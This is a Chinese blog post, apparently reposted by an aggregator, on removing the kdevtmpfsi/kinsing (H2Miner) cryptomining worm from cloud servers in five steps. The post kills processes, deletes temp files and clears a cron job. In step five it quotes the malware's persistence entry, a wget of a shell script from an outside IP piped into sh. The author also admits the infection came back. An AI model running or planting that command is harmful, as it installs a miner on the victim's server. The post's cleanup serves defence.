登錄阿里云??服務器查看了一下top，發現 kdevtmpfsi 的進程 cup 占用快100%了，騰訊云官方也有相關的 處理方法 騰訊手動清除H2Miner的【2?? 條建議如下】：

查找路徑為/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的進程，將其kill掉并刪除對應的文件；

查找crontab任務中包含“95.3.146.118”的相關項并刪除。

在網絡上查看發現中招的朋友不少，詳細的處理過程如下【一共 5?? 個步驟】

1?? 查看kdevtmpfsi的守護進程kinsing先kill掉【否則kdevtmpfsi進程會不斷恢復占用】

[root@aliyun ~]# ps -aux | grep kinsing [root@aliyun ~]# kill -9 kinsing_pid

2?? 查看kdevtmpfsi的進程并kill掉

[root@aliyun ~]# ps -aux | grep kdevtmpfsi [root@aliyun ~]# kill -9 kdevtmpfsi_pid

3?? 刪除/tmp/下kdevtmpfsi相關文件

[root@aliyun ~]# cd /tmp/ [root@aliyun tmp]# rm -rf kdevtmpfsi

4?? 刪除/var/tmp/下kinsing相關文件

[root@aliyun ~]# cd /var/tmp/ [root@aliyun tmp]# rm -rf kinsing

5?? 查詢并刪除定時任務

# 查詢 [root@aliyun ~]# crontab -l * * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1 # 編輯刪除【如果沒有在用的其他定時任務可刪除全部定時任務 crontab -r】 [root@aliyun ~]# crontab -e

至此，阿里云的服務器問題解決 😳 【騰訊云??也出現了這個病毒，處理方法基本一致】實際上并未徹底解決，后來又出現了 😭 出現之后再次執行一遍即可，現在有一段時間沒見到它了~

總結

以上是生活随笔為你收集整理的【Linux病毒】阿里云+腾讯云服务器的 kdevtmpfsi（H2Miner挖矿蠕虫变种）病毒处理（5个详细步骤）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。